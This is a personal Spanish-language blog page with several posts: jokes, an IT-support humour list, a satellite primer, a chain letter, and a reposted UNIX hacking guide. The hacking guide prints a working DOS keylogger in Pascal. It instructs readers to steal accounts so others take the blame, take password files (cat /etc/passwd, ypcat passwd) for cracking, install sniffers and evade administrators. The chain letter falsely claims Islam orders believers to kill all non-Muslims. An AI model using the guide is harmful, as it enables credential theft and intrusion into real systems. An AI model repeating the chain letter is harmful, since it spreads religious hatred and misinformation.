Blog de mgl que mas dá de que se trate, el chiste es escribirlo

La religión del odio

mayo 31

La religión musulmana es la que más crece en número en los Estados Unidos, especialmente en los grupos minoritarios.

El mes pasado asistí a una clase de entrenamiento requerida para mantener mi status de seguridad en el departamento de prisiones del Estado.

Durante la reunión hubo una presentación por tres disertantes, uno Católico, uno Protestante y uno Musulmán, quienes explicaron sus creencias.

Me interesaba sobre todo, lo que el Imán islámico diría. El Imán hizo una completa y gran presentación de las bases del Islam, incluido vídeos.

Después de las presentaciones, se concedió tiempo para preguntas y respuestas.

Cuando llegó mi turno pregunté al Imán:

“Por favor, y corríjame si me equivoco, pero entiendo que la mayoría de imanes y clérigos del Islam, han declarado la Yihad (guerra santa) contra los infieles del mundo. De modo que matando a un infiel, que es una orden para todos los musulmanes, tienen asegurado un lugar en el cielo. Si así fuera el caso… ¿ Puede usted darme una definición de infiel? ”

Sin discutir mis palabras, contestó con seguridad:

“ Son los no creyentes ”.

Contesté:

“ Permítame asegurarme que le entendí bien. A todos los seguidores de ALÁ, le ha sido ordenado matar a todo el que no es de su fe para poder ir al cielo? ¿Es correcto? ”

La expresión de su cara cambió de una autoridad a la de un chico con la mano en la lata de galletas. Vergonzosamente. Contestó:

“Así es ”

Agregué:

“ Pues bien, señor, tengo un verdadero problema tratando de imaginar al Papa Benedicto ordenando a todos los católicos matar a todos los de su fe islámica, o al Dr. Stanley ordenando a los protestantes hacer lo mismo, para ir al cielo ”.

El Imán quedó mudo.

Continué:

“ También tengo problema con ser su amigo, cuando usted y sus colegas dicen a sus pupilos que me maten. ¿Preferiría usted a su Alá, que le ordena matarme para ir al cielo, o a mi Jesús que me ordena amarlo para que yo vaya al cielo y quiere que usted me acompañe? ”

Podías oír la caída de un alfiler cuando el Imán inclinó avergonzado su cabeza.

Con nuestro sistema de justicia liberal, y por presión del ACLU (organización árabe americana), este diálogo no será publicado. Ruego lo haga circular por toda su lista de direcciones.

Rick Mathes
Capellán de Prisiones EE.UU.

Un agradecimiento

mayo 27

a Evan Eckard por la creacion de este diseño y el permiso para modificarlo (para cuando tenga tiempo de hacerlo)

:D

Con cual te identificas?

mayo 24

Auto compacto (se define como bocho, pointer, matiz, etc): es aquel hombre q es ahorrativo, no se preocupa por el que diran, casi siempre son licenciados, vendedores, que andan parriba y pabajo
Auto taxi (tsuru jjja) : aque l hombre q posee un tsuru o es taxista o lo compro creyendo la leyende de “NUNCA TAXI”
Autos familiares y camionetas viajeras (vans, suburban, lanchotas) hombre resignado a la vida que l toco ya que su auto esta lleno de cosas de niños , estampas de barney en el tablero y cristales y un sticker de bebe a bordo, viajan siempre… y cargan hasta con la suegra
Auto deportivo: existen dos tipos el real deportivo y al que lo hacen deportivo: quien trae un coche deportivo es un junior, un señor de lana que piensa que con eso van a levantar nenas (aveces pasa) y el que lo hacen deportivo: poner spoiler, luces neon, luz negra, sonido, calcas de rapido y furioso, tapas tipo rin cromadas, eso a un tsuru verde mayate no lo hace deportivo.
Auto de lujo: ahi nada mas hay de dos sopas o eres chofer del auto, o eres un ricachon que todo mundo te tiene envidia
Auto clasico o antiguo: si tienes uno de estos : o eres jodido y no te puedes comprar uno nuevo, o te gusta restaurar autos, lo tratas mejor que tu vieja , lo enceras, le cuidas de el sol, dices que es el mejor de todos.
Auto todo terreno: eres un rebelde, no te importa si hay topes, hoyos, banquetas, intimidas a la gente mostrando tus llantotas, mirandolos hacia abajo y aventandoles el auto sabiendo que te tienen miedo y te dejaran pasar, nunca lo lavas, solo cuando llueve y buscas cualquier charco para meterte, si llueve eres el unico que quiere salir.
Auto utilitario: jajaja lo usas para (estar con tu vieja, ponerte pedo con los cuates, de basurero, para guardar los libros, para cambiar a la abuelita, para vender frituras afuera de las escuelas, etc etc.
Motocicleta: tambien hay de dos o eres repartidor de dominos y cobrador o vendes la lechee…… ó eres un aventurero que te gusta la velocidad y sentir el aire contaminado de la ciudad, estas dispuesto a sufrir caidas y raspones.
Camionetas: se identifica aquel que es empresario, constructor, narco, o de la CFE. y andas diciendo siempre (y la cheyeene apaaaa)

¡Lo que hacemos por ser Informaticos!

mayo 17

 1. Cuando el ingeniero de sistemas le diga que acude en su ayuda, desconéctese de la red y vaya por un café. No nos espere, para nosotros no es ningún problema acordarnos de todos las claves de usuario. Ademas de que nos encanta llegar y que no haya nadie.

2. Cuando nos llame para decirnos que cambiemos su computador de sitio, asegúrese de que lo deja bien enterrado bajo media tonelada de postales, fotos de sus niños, animales de toda clase, flores secas, trofeos varios, etc. A nosotros, como no tenemos vida privada, nos encanta echar un vistazo a la suya.

3. Cuando el ingeniero de sistemas le envíe un correo electrónico de importancia alta, bórrelo inmediatamente sin leer: Lo más probable es que estemos haciendo pruebas.

4. Cuando el ingeniero de sistemas esté almorzando, entre sin ninguna consideración y explíquele sus problemas esperando a que se le responda en el acto. Estamos aquí para servirle y siempre a punto para solucionar problemas.

5. Cuando el ingeniero de sistemas esté tomando un café tranquilamente, pregúntele algo acerca de los computadores. La única razón por la que nos vamos a tomar café, es para atender a las personas que no tienen correo electrónico o teléfono.

6. Mande todos sus mensajes en mayúsculas. El servidor de correo lo recogerá inmediatamente y lo tratará como mensaje urgente.

7. Cuando llame al teléfono del ingeniero de sistemas, pulse el número 5 para saltarse el mensaje que le dice que está de vacaciones y grabe su mensaje. Entonces, espere exactamente 24 horas antes de mandar un correo electrónico directamente a su jefe quejándose de que no ha recibido ninguna respuesta a su llamada. Usted no se merece este trato.

8. Cuando la fotocopiadora no funcione, llame al ingeniero de sistemas. Al fin, la fotocopiadora tiene cables, ¿no?

9. Cuando su módem le dé el mensaje: ‘No hay tono de marcado’, en casa, llame al ingeniero de sistemas. Podemos solucionar problemas de la compañía telefonónica desde donde sea.

10. Cuando su computador no funcione, tírelo encima de la silla del ingeniero de sistemas y no deje ningún papel con su nombre ni la descripción del problema. Nos encanta el misterio.

11. Cuando el ingeniero de sistemas le esté explicando cómo cambiar algún parámetro de su configuración o como operar algún equipo, póngase a leer el periódico, atienda a la demás gente, voltee a otro lado o súbale al radio. De hecho, no esperamos que usted tenga que hacer nada, simplemente nos encanta oírnos a nosotros mismos cuando explicamos algo.

12. Cuando le demos alguna explicación sobre algún programa, no se moleste en aprender ni mucho menos tome apuntes. Siempre estaremos ahí para volver a hacerlo.

13. Cuando la impresora no imprima, reenvíe su trabajo al menos 20 veces. A veces los trabajos que intenta imprimir desaparecen en el cosmos sin razón aparente.

14. Cuando la impresora no imprima tras los 20 intentos, envíe su trabajo a todas las demás impresoras de la empresa. Seguro que alguna imprimirá. Si ninguna impresora lo imprime, llámenos con mucho enojo, a nosotros nos encanta ir a encender impresoras.

15. No use la ayuda que viene en los programas. Estas ayudas on-line sólo son para muy brutos. Y si nos ve alguna vez usarlos nosotros, es que a veces somos muy brutos.

16. Cuando vaya a tomar algún curso de informática, no dude en practicar con la red de la empresa e instalar y probar todo lo que desee. Estaremos encantados de trabajar hasta la madrugada para arreglar todos los estragos que usted cause.

17. Cuando lleguemos a reparar su computador y esté usted comiendo, deguste con calma su almuerzo en nuestra cara. Funcionamos mejor bajo presión.

18. Nunca nos dé las gracias ni mucho menos nos pregunte: ¿Cuánto le debo?. Nos encanta nuestro trabajo y, además nos encanta regalarlo.

19. Cuando el ingeniero de sistemas le pregunte si ha instalado algún nuevo programa en su computador, mienta. ¡A nadie le importa lo que usted tiene en su PC!

20. Si el cable de su ratón siempre tira el gatito de porcelana que tiene usted encima de la mesa, levante el computador y pise el cable con él. Los cables de ratón están diseñados para aguantar 80 kilos de peso.

21. Si la tecla {Enter} de su teclado no funciona, échele la culpa a la actualización del correo electrónico. No se le ocurra que es porque esta sucio, ya que los teclados funcionan mucho mejor con medio kilito de migas de galleta, cabellos y manchas secas de Coca Cola debajo de las teclas.

22. Cuando el sistema le muestre la típica ventana de ‘Está usted seguro…’, conteste siempre que ‘Sí’ o ‘Aceptar’. ¿Si no estuviera usted seguro no lo habría borrado, verdad?

23. Siéntase completamente libre para decir ‘No tengo ni idea acerca de esta mierda de informática’. A nosotros nunca nos ha molestado que la gente diga que nuestra profesión es una mierda.

24. Cuando necesite cambiar el cartucho de toner, llame al ingeniero de sistemas. El cambio de cartucho es una tarea extremadamente complicada y Epson recomienda que solamente la realice un ingeniero con una maestría en hardware.

25. Cuando le suceda algo a su computador, pida a su secretaria (si la tiene) que nos llame, si no tiene secretaria, pidale a quien pase enfrente pero nunca nos llame usted mismo. A los que trabajamos en un Soporte Tecnico nos encanta tener que tratar con una tercera persona que no tiene ni idea de cuál es su problema.

26. Cuando escanee la foto de su última parranda, de 30 megas, a tope de colores y resolución, envíela a todo el mundo a través de su correo electrónico y, por supuesto, indique alta prioridad. Tenemos montooooones de megas libres en el servidor y un procesador del carajo.

27. Cuando tenga que imprimir chorro cientos mil folios, no se le ocurra ir imprimiendo de poco en poco: ¡Mándelos todos de una vez! Los demás pueden esperar, usted tiene prioridad.

28. Cuando se encuentre por casualidad a su ingeniero de sistemas durante el fin de semana, no dude en hacerle preguntas acerca de computadores. Nosotros trabajamos 24 horas al día, 7 días a la semana, incluida la playa en verano, la nieve en invierno, supermercados, cines, domingos y dias festivos, etc.

29. Si sus hijos estudian informática, tráigalos el fin de semana a la oficina. Ahí estaremos para prestarles cualquier equipo, reparar su base de datos de Access hecha trizas por su copia ilegal de Visual Basic, etc.

30. Cuando nos traiga su computador clónico de casa para que se lo reparemos gratis, por favor recuérdenos que es urgente para que por la tarde pueda usted jugar al solitario. ¡Ahí estaremos! Nos sobra tanto tiempo, y el día es tan largo. De todas formas, ¡todo el mundo sabe que perdemos constantemente el tiempo navegando por Internet!

31. Cuando necesite la ayuda del ingeniero de sistemas para hacer una presentación, no se afane, puede pasarla unas pocas horas antes. ¿Acaso no sabe que podemos hacer milagros? 

32. Si alguna vez quiere mandar un correo electrónico de 10megas a través de un servidor que solo permite máximo 2megas, no lo piense y envíelo muchas muchas veces, en alguna de esas tiene que caber. Si por alguna razón no lo manda, llámenos a nuestra casa ¡¡no importando que sea de madrugada!! Nosotros debemos de poder resolver los problemas de los correos gratuitos.

33. Cuando su computador ya no encienda, no nos lo mande a nosotros que terminamos la carrera de Ingeniería Informática, sino lleveselo a su sobrino que estudia computación en la secundaria. El debe de saber ya que eso estudia. Además, a nosotros nos encanta resolver los problemas que causa la gente que no tiene ni la menor idea de que significa “hardware”. ¡¡Es problema de computación, no de ingles!!

34. Cuando nos visite, pidanos que le copiemos en un disquete, la ultima canción del grupo de moda o el último video que acaba de sacar su artista favorito. Nosotros lo debemos de tener, es nuestra obligación. Y si no lo tenemos, enojese con nosotros, ¿a caso mp3 no es de computación?

35. Si el video que quiere si lo tenemos, pero no cabe en un disquete, enojese, insúltenos e incluso hasta golpeenos, ¡¡porque ha de caber!!

36. Si por algún “error del computador” o “error del Ingeniero de Sistemas” su hijo de 16 años tiene en sus favoritos paginas pornográficas, es su deber y esta en su derecho de molestarse con nosotros y de creer que nosotros se los pasamos. Porque su hijo es incapaz de eso, además, las páginas pornográficas estaban en la computadora.

37. No dude en interrumpirnos a la hora de la comida, y hacernos viajar 15 kilómetros para ir a instalarle el papel a su impresora urgentemente. El papel solo puede ser instalado por Ingenieros Profesionales. Y si se nos ocurre cobrarle, no nos pague, ¡¡porque nos va a pagar si poner el papel es de lo mas sencillo!!

38. Nunca, nunca, nunca, ni por error, se le vaya a ocurrir leer los manuales de instalación, ni mucho menos el de operación de su equipo que acaba de comprar. Si no sabe como encenderlo simplemente ¡¡llámenos!!

39. Cuando opere algún programa nuevo y no sabe como, llámenos, nosotros debemos de saber operar todos los programas que existen en el mundo, incluso el que acaba de bajar del Internet que esta en Arameo Antiguo. Nosotros le debemos dar soporte, aunque no sepamos ni una maldita palabra de Arameo.

40. Nunca compre Ud. Las licencias de sus programas que utiliza, siempre pidanos que le regalemos una copia, usted no tiene porque pagar los derechos de uso si ya los pagamos nosotros.

41. Si su hijo le mete monedas a la unidad de disquetes o se cuelga de la charola del CDROM o la usa de portavasos y lo rompe, o la golpea o cualquier cosa que le haga que la dañe, ¡reclamenos con todo derecho! Eso lo debe de cubrir la garantia.

42. Siempre diganos que ese mismo equipo que le ofrecemos lo tiene la tienda “x” mucho mas barato, aunque no sea cierto, nos encanta que nos comparen.

43. Nunca le haga mantenimiento preventivo a su equipo. Eso no sirve de nada, es solo un pretexto de nosotros para sacarle dinero.

Ah, ¡y discúlpenos por ser Informaticos

Curso rápido de satélites.

mayo 17

1) Los satelites para transmision de TV (y otras cosas) se ubican en la orbita geoestacionaria, a aprox. 36000km de altitud (42000km de radio), de modo que orbiten la Tierra una vez cada 24 horas y parezca que estan fijos sobre un punto.

2) Cada satelite tiene en promedio unos 20 transponders (algunos mas, algunos menos), por lo general cada uno de estos transmite unsolo canal de TV aunque pueden ir mas; si la transmision es digital, sobre, todo.

3) Cada satelite dispone de varias antenas, tanto para recepcion como para transmision, no necesariamente apuntadas en la misma direccion.

4) Los diversos transponders pueden estar utilizando diferentes antenas, para enviar o recibir sen~ales a o de ubicaciones geograficas distintas

5) Esta cobertura puede ser puntual, local o global, segun el ancho del haz de la antena. Por ejemplo, una que emita un haz concentrado en una localidad se considera puntual, una que transmita para un pais se considera local (o regional) y una que transmita a todo el continente o ambos hemisferios es global.

6) Dentro de la zona de cobertura de un haz, la potencia es maxima logicamente al centro, luego va disminuyendo conforme se aleja del centro. Esta disminucion no se da en forma de circulos concentricos sino irregular.

7) De todo lo anterior, paso a explicarles: El PanAmSat, por ejemplo, aqui tenemos la suerte de que tenga una de sus antenas centrada en el Peru (logico, por eso, que haya puros canales peruanos) y se puede captar mas al sur y por el norte (aunque ya debil) hasta Miami. El caso de la KWGN debe ser el inverso, en su caso ese satelite usa un haz centrado en los EE.UU. y cuya extension llega a alcanzar hasta el Peru, pero ya al limite… (por eso no llega a Argentina). En el caso de Uniseries, segun me explicaron, usan un haz de cobertura domestica, solo para la region de Argentina, Uruguay y Paraguay. El haz no llega mas alla. En el caso de Infinito, en cambio, si utilizan un haz de mayor amplitud, para enviar la sen~al a otros paises.

hacking bajo UNIX

mayo 17

Hola a todos, este es mi primer escrito que hago sobre estos temas para esta revista, no se que tal me quedara, pero intentare que sea lo mejor posible. En este, mi primer articulo, voy a intentar hablar sobre el tantas veces hablado hacking bajo UNIX. Mi idea es sentar las bases y las pautas que debe tener un hacker normalucho (porque buenos hackers hay muy pocos y pertenecen a otra orbita), asi que si alguien espera encontrarse aqui un bug para “arreglar” la ultima version del SunOS, pues mejor que deje de leer inmediatamente.

Antes de seguir hay que decir que no es aprobable el borrar cosas, es mas provechoso el apropiarse de recursos que de otra forma no podrias poseer, por ejemplo, una cuenta de acceso a internet en una maquina menos saturada y mas rapida que la del alumano (por decir algo), o la posibilidad de pillar datos ajenos…. es decir, cosas que dentro de lo malo no causa daños a nadie.

De entrada hay que buscar el sitio adecuado para hackear, yo recomiendo siempre las universidades, digamos que son las mas adecuadas ya que si te pillan no te haran demasiado. Si estas hackeando por modem, pues o procuras enchufarte de alguna forma al telefono de tu vecino o como te cazen te meten un paquete que te acuerdas. Si estas hackeando en la empresa donde trabajas, pues hombre, puedes perder el puesto de trabajo, lo cual no es aconsejable de ningun modo. Con lo que quedan las universidades, en las cuales si te cazan pues te puedes hacer el loco, y eso siempre que seas universitario porque si no lo eres pues te hacen menos todavia, en cuyo caso basta con que salgas por patas.

Si eres universitario, lo mejor es que te pongas a hackear siempre en un ordenador lo suficientemente bien situado como para que si ves venir a alguno de los operadores o becarios te pueda dar tiempo a cerrar todas las sesiones (nunca dejes nada abierto) pulsa alt-x si estas en un pc, o si estas en un terminal dale a la tecla de cortar y luego ejecutas “close all”; una vez hecho eso, simplemente te haces el loco, lo niegas todo, dices que acababas de llegar y a vivir que son dos dias.

Si llegais al punto de que os cazan, teneis que saber una cosa y es que nunca tienen pruebas concluyentes contra vosotros, se limitan a acojonaros hasta que os declareis cumpables, si nunca os declarais culpables al final tendran que olvidarlo todo. La unica prueba realmente concluyente seria que alguien os viera directamente lo que estais haciendo, el resto de pruebas se basan en logs y en basura informatica que para que pudiera tener algo de validez tendria que estar compulsada notarialmente en el mismo momento que es recibida ya que si no esta compulsada notarialmente en ese mismo momento no es valida legalmente ya que no se sabe si ha sido modificada (con un simple editor de textos) o no.

El primer paso es, logicamente, buscar una cuenta de trabajo que no sea la tuya, y desde el primer momento usa la cuenta de otro, para que nunca te cojan haciendo cosas raras con tu cuenta. Lo mas normal es que lo que haces quede registrado en algun log (y no en todos los casos) y cuando miran el log buscando por cadenas que revelan instrucciones comprometidas pues te descubren; por esto hay que usar la cuenta de otro, si te descubren iran a por el propietario legitimo de la cuenta y a ti no te pasara nada. Tambien pueden estar utilizando monitores que dan la alarma cuando algun usuario hace cosas anormales o incluso hay UNIX que implementan sistemas de deteccion que avisan con un write a la consola de ciertas cosas como reiterados accesos erroneos a una cuenta y todo tipo de acciones que os podais imaginar y que solamente tienen que ser configuradas por el administrador de turno.

Para hacerte con la primera cuenta hay tres formas sencillas, a continuacion las enumero y doy una explicacion de cada una. Esto, naturalmente, que no tuvieras una ya, ya que si tienes una propia, siempre puedes robar el fichero de passwords e intentar algun John the Ripper o similares. El metodo de ponerse en el login y sabiendo una cuenta intentar acertar el password a pelo, no es recomendable, primero porque podria saltar algun aviso en la consola a cuenta de los intentos sucesivos fallidos, la segunda porque podrias dejar la cuenta bloqueada y la tercera es que es dificilisimo. Yo lo habre probado cosa de media docena de veces y acerte una vez, pero vaya, lo normal es que no aciertes, y el tema de las cuentas con password por defecto, creo que practicamente ya no existe.

1- metodo (mirada furtiva), pues simplemente te dedicas a mirar al teclado de la gente que entra en su cuenta. Siendo disimulado y teniendo en cuenta que hay gente que va a pulsacion por segundo, pues le cazaras el password sin problemas. Yo he conocido a autenticos especialistas en esta tecnica, sir in mas lejos, un amigo era capaz de cazarle el password a la primera a cualquier persona que teclee a menos de unas 200 pulsaciones por minuto; y se teclearas a la velocidad que sea te pillaba el password en un maximo de dos veces. Yo mismamente, metiendo un password de 8 caracteres en un segundo, me ligo el password a la segunda vez que me vio meterlo.

2- metodo (papelito revelador), pues eso, la gente es incapaz de recordar su password, y por eso lo apunta en algun papel, y suele ser que en un papel tengan los passwords de todas las maquinas a las que tienen acceso. Con lo que en el momento que lo sacan tienes unos instantes para memorizar el password. Luego es posible que tengan el mismo password en todas las maquinas a las qeu tienen acceso, ya no solo porque ellos se lo hayan puesto asi, sino porque el listo del administrador de turno asi lo ha dispuesto.

3- metodo (capturador de teclado), este es el que mas me gusta. Cojes y te vas a un ordenador (no vale terminal) y ejecutas la mierda de programa que te pongo a continuacion. Una vez ejecutado te pones a hacer el tonto hasta que viene el tipico julai que te dice “me dejas un momento entrar en mi cuenta para bajarme unos ficheros a disco”, vas tu y le dices “como no, para eso estamos los amigos, para ayudarnos entre nosotros” y pulsas F7, al hacer eso se vaciara el buffer y memorizara a partir de ese momento las primeras 512 pulsaciones. Cuando el julai en cuestion se va vas tu y pulsas F8, y en ese momento te apareceran las 512 teclas pulsadas y entre ellas el login y el password claro esta. Capturadores de teclado hay muchos, pero si quieres puedes usar el mio, que es facil, cortito y muy efectivo; aunque reconozco que los hay mas completos y mucho mejores que el mio.

————

uses dos;

{$M $800,0,0}

(* Grabador de teclado *) (* *) (* F7 -> Inicializa el buffer de teclado. *) (* F8 -> Muestra e incializa el buffer de teclado. *)

var KbdIntVec : Procedure; tab : array[1..512] of byte; n : integer;

procedure mostrar_autor; begin writeln; writeln(‘ Grabador de Teclado. ‘); writeln; writeln(‘ Autor: Lordman. 1 de Enero de 1996. ‘); writeln; end;

procedure inicializar; begin for n := 1 to 512 do tab[n] := 0; n := 0; end;

procedure mostrar; var car : char; tdec : string[53]; begin tdec := ‘ 1234567890 ! qwertyuiop + asdfghjkln – zxcvbnm,.- ‘; for n := 1 to 512 do begin if (tab[n] >= 1) and (tab[n] <= 57) then car := tdec[tab[n]] else car := ‘ ‘; write(car); end; inicializar; writeln; end;

{$F+} procedure Keyclick; interrupt; var aux : byte; begin aux := port[$60]; if aux < $80 then begin if n <= 512 then n := n + 1; tab[n] := aux; if aux = 66 then mostrar; if aux = 65 then inicializar; end; inline($9C); KbdIntVec; end; {$F-}

begin

mostrar_autor; inicializar; GetIntVec($9,@KbdIntVec); SetIntVec($9,Addr(Keyclick)); Keep(0);

end.

————

Cuando tengas ese password fijate a ver si son passwords de inicializacion. Me explico, ya he visto casos de cuentas que se creaban con passwords por defecto que seguian una tonica similar, por ejemplo, login: cuenta47, password: pass47, ?entendeis a lo que me refiero?.

Una vez que hayas conseguido la primera cuenta tienes que en distinto turno en el que el julai te haya pedido el favor. Es decir, por norma general la gente entras en sus cuentas en el turno de manana (de 9 a 2) o en el de tarde (de 3 a 8), con lo que tu tendras en cuenta ese detalle, date cuentas que si pillas con una maquina que no permita duplicidad de usuarios la puedes liar si el tio al entrar la maquina le dice que esta ya conectado.

Cuando entres la primera vez en la cuenta robada (y en cualquier otra que consigas) deberas utilizar el comando “last | grep <usuario>” cuyo comando te dara un listado de los ultimos accesos a esa cuenta, en cuyo listado podras ver a que horas se conecta el propietario de la cuenta y podras intentar evitar el coincidir con el.

Una vez entrado en la cuenta se recomienda hacer un doble login, es decir, 1 minuto despues de entrar ejecutas el comando “login” y vuelves a entrar para que al hacer un finger no aparezca puesto de acceso en donde estas. No es un sistema definitivo ya que te pueden cojer igualmente, pero por lo menos no lo pones tan facil. El esperar 1 minuto es para que en la lista de accesos no aparezcan los dos con una diferencia de pocos segundos y se deduzca que estas en el puesto de acceso desde donde se realizo la primera conexion. Insisto que no es un sistema definitivo, pero es algo, al menos si hacen un finger no aparecera el puesto de acceso desde donde os conectais. Aunque pueden usar las estadisticas de red y ahi sale todo, pero bueno, algo es algo.

Ten cuidado cuando uses la cuenta de trabajo para cosas provechosas. Disimula para que parezca que no estas haciendo nada malo, es decir, haz ftp’s a donde sea (maquinas locales si no hay acceso a internet), telnet’s, juega a algun juego que haya disponible, haz algun talk……. y en medio de todo eso pues ya sabes haz lo que de verdad te interese hacer. Mas que nada porque todas esas cosas que te he puesto anteriormente es lo que hace un usuario normal y claro, antetodo teneis que hacer ver que vosotros sois un usuario normal.

Otra cosa que esta bien hacer, es comprobar lo que hace la gente, para que si te estas rastreando tengas posibilidades de salirte a tiempo de la cuenta. Ejecutar el comando “w” y el “ps -u root” esta bien para ver lo que hace la gente y si ves que te referencian a ti, o a algun proceso que hayas estando haciendo, o a algun comando…. (todo ello anteponiendo, por parte del operador, el comando grep a veces) pues mal asunto, sal por patas que a lo mejor hay problemas. Una cosa tienes que recordar, no te preocupe no hackear el tiempo que a ti te hubiera gustado, piensa que manana habra mas tiempo, pero si te ligan a lo mejor manana no hay mas tiempo.

Llegado a este punto ya tienes una cuenta, lo primero que hay que hacer es intentar llevarte el fichero de passwords. Para esto hay fundamentalmente dos formas, la primera es un “cat /etc/passwd >passwd” aunque si la maquina tiene el fichero de passwords en shadow no te servira, en el caso de ficheros shadow y si la maquina es servidor de cuentas de otras maquinas (NIS) al ejecutar el comando “ypcat passwd

>passwd” recibiras una lista de todas las cuentas y sus passwords >sin

nada de shadow. Por ultimo estan algunas rutinas que sacan el fichero de passwords, yo personalmente nunca las he utilizado, aunque tambien es verdad que lo he intentado poco ya que o bien hackeaba contra sistemas UNIX sin shadow o bien con el truco de ypcat me bastaba. Si quereis buscar esas rutinas que os he comentado pues tirad de internet que hay mazo de ellas.

Una vez que has conseguido el fichero de passwords, te lo llevas a casa y alli utilizas los famosos crackeadores de cuentas UNIX como el John the Ripper, KillerCracker, Hades, BruteJack…. y intentas descubrir passwords desde tu casa y con la maxima discreccion que eso mismo conlleva. Con este sistema deberas conseguir bastantes cuentas para cubrirte las espaldas si pierdes alguna. Os puedo decir que en cierto servidor gratuito de email de mas de 13.500 cuentas logre petar casi 2.000, asi que os podeis hacer una idea de hasta donde se puede llegar. No os pongais a buscar servidores gratuitos de email porque le reporte al webmaster el error y ya esta solucionado. El error consistia en que podias hacer ftp con tu login y tu password para acceder al espacio dedicado a tu pagina web, una vez hecho eso te desviabas al subdirectorio donde estaba el fichero de password, lo cojias y como el sistema no tenia shadow pues asunto solucionado.

Luego deberas empezar a ejecutar maravillas como el Satan o el Cops y ver que pasa. No voy a explicar el funcionamiento de estos sistemas asi que a buscar el fichero y leeros el manual. En la misma maquina siempre podeis ejecutar el famoso “crack” el cual probara permutaciones de palabras y diccionarios hasta practicamente el infinito, este software nunca acaba, asi que no espereis a que acabe porque nunca lo hara. El problema es que si dejais un proceso de fondo estais sobrecargando demasiado la maquina y es posible que se den cuenta los administradores, aunque no necesariamente, un amigo mio ejecuto un proceso de esos sobre la cuenta root de una maquina de una facultad y tardaron 20 dias en descubrir el proceso. Naturalmente cuando lo descubrieron ni idea de quien fue y se limitaron a pararlo. Lo curioso es que la maquina mostraba un factor de carga altisimo y no se aparon del burro en 20 dias.

Llegado a este punto hay que empezar a buscar otras alternativas. De entrada y antes de seguir comentaros que os olvideis de bugs de sendmail, me puedo arriesgar a decir que no queda ninguna maquina que cuente con versiones del sendmail que casquen, bueno, si os encontrais con un bug descubierto este ano, pues vale, sirve, pero no intentes los infinitos bugs que aparecen porque lo llevais claro para que funcione uno. Alguna posibilidad teneis, pero se puede decir que si la version es una 8.x olvidaros de todo, si es una 7.x a lo mejor teneis algo por ahi y las unicas que petaban por todos los lados eran las 5.x. Daros cuenta que si hubiera una version petable del sendmail, fijo que ya la habrian petado antes que llegarais vosotros, con lo que si podeis mirar que version es por si tuvierais suerte pero no os obcequeis con probar bugs del senmail a ver si alguno funciona porque es dificil.

Si vais a hacer cosas peligrosas los mejores momentos son de 8 a 9 de la manana (los operadores estan llegando todavia o desayunando), de 2 a 4 de la tarde (estan comiendo como cerdos o cotilleando como marujas) y a partir de las 7 de la tarde (para esa hora se han ido a casa a decirles a sus mujeres lo buenos que han sido y lo bien que se han portado), aunque debereis verificar los horarios y ver cuales son los mas adecuados. Ni que decir que ni se os ocurra hacer nada por telefono, estais pillados y os pueden hacer un hijo de plastico.

Llegado este punto hay que plantearse la posibilidad de instalar un sniffer. Basicamente, hay tres posibles sniffers.

1- – Sniffer corriendo bajo MS-DOS. No es recomendable ya que la red novell lo detecta, no como sniffer, sino como que esta pasando algo raro en un puesto de acceso concreto.

2- – Sniffer desde cuenta UNIX, el mas usado, aunque no por ello el mas seguro. Hay utilidades UNIX que detectan si se esta ejecutando un sniffer en la maquina, aunque los operadores no suelen usar estas utilidades y en el peor caso te quedarias sin cuenta y procederias a usar otra, ya sabiendo que eso no lo puedes hacer. No obstante suelen detectar tambien estos procesos porque corren durante demasiado tiempo.

3- – Sniffer montado desde un Linux, el mas sofisticado y el que requiere algo de experiencia en Linux. La idea es muy sencilla, preparas un disco con una instalacion super-reducida del Linux, arrancas bajo MS-DOS y luego ejecutas el Linux. La instalacion del Linux debera ser en modo MS-DOS utilizando ficheros que se descomprimen en memoria gerando una unidad virtual. Esta sistema ademas te ofrecera la posibilidad de montar unidades de distintas maquinas, usando el famoso bug de la PC-NFS que consiste en que si quieres acceder a una cuenta que no sea la de root, no tienes mas que crear una cuenta con el mismo login (en tu maquina portable) y hacer un mount del subdirectorio. Ojo con dejar los demonios de entrada a la maquina, no vaya a ser que el operador haga un rastreo de ip’s y vuestra maquina responda. Me explico?, se instala in linux super-reducido en formato MS-DOS en un disquete, incluyendo una unidad RAM donde estan los pocos ejecutables que necesiteis.

Apartir de aqui, ya solo queda el sistema de empezar a probar bugs que hay en distintas direcciones de internet dedicadas a la materia. Para empezar estan bien las http://www.rootshell.com y http://www.hha.net; la de rootshell te permite hacer busquedas en base a palabras, lo cual te ofrece la posibilidad de introducirle el nombre del software UNIX que hay instalado y el buscador te mostrara lo que tiene. Creo que tambien, una de ellas, te permitia buscra por sistemas operativos, aunque eso ya no me acuerdo bien.

Un ultimo detalle que es obligado a la hora de dedicarse a esta tan noble arte es conocer al operador del sistema, si puedes hazte amigo de el, vete a tomar unas copas con el, incluso de vez en cuando que parezca que eres su amigo, es decir, utiliza la psicologica.

Hay varios tipos de operadores, tu futuro dependera del tipo con el que te tropiezes, mas o menos, se pueden resumir, segun mi experiencia, en cinco formatos de operador.

- El reprimido sexual, este es el peor, es como si su mujer le pegara y no hiciera el amor con el, lleva 7 anos sin follar y siente el orgasmo en base a buscar cabezas de turco, buscar culpables donde no los hay y demostrar su profesionalidad acusando a todo el que se le pone por delante para poder lavarse las manos y que antetodo siga intacta su imagen y prstigio internacional (por lo menos). Peligrosisimo y hay que tener mucho cuidado con el.

- El chuloputas, sin mas un chulo a nivel maximo. Continuamente esta demostrando su chuleria este donde este. Este es menos peligroso porque si te caza sin mas te humillara un poco y te dira que eres una mierda, pero al final posiblemente te dira que no lo vuelvas a hacer y es posible que lo olvide.

- El pasota. Sin mas el tipico que se limita a cobrar el sueldo a fin de mes y meterse en el minimo de lios posibles. Con este no tendras problemas ya que para que nadie dude de su profesionalidad si te caza lo arreglara contigo en privado, no te denunciara para no desvelar que le has hackeado el ordenador. Incluso es posible que a cuenta de eso se haga colega tuyo.

- El pelota. Pasa su vida haciendo la pelota a su superior mas proximo. Carece de personalidad alguna y es incapaz de pensar por si mismo. Si quieres saber con quien estas tratando deberas analizar a su superior y no a el.

- El subnormal. Pues eso, eimplemente, subnormal, no tiene ni idea de lo que hace, le han reciclado hace poco y no sabe ni por donde le da el aire, basicamente, sabe crear cuentas, cambias passwords y poco mas.

Puesta hasta aqui ha llegado mi primer articulo electronico. En el segundo voy a tratar el tema de que hacer si se tiene un password de root, aparentemente puede parecer absurdo lo que planteo pero vereis que no es tan absurdo y hay que tener en cuenta muchas cosas para poder usarlo, a no ser que el operador pase de todo o sea un inutil, claro esta.

Memorias de laboratorista de computo

mayo 17

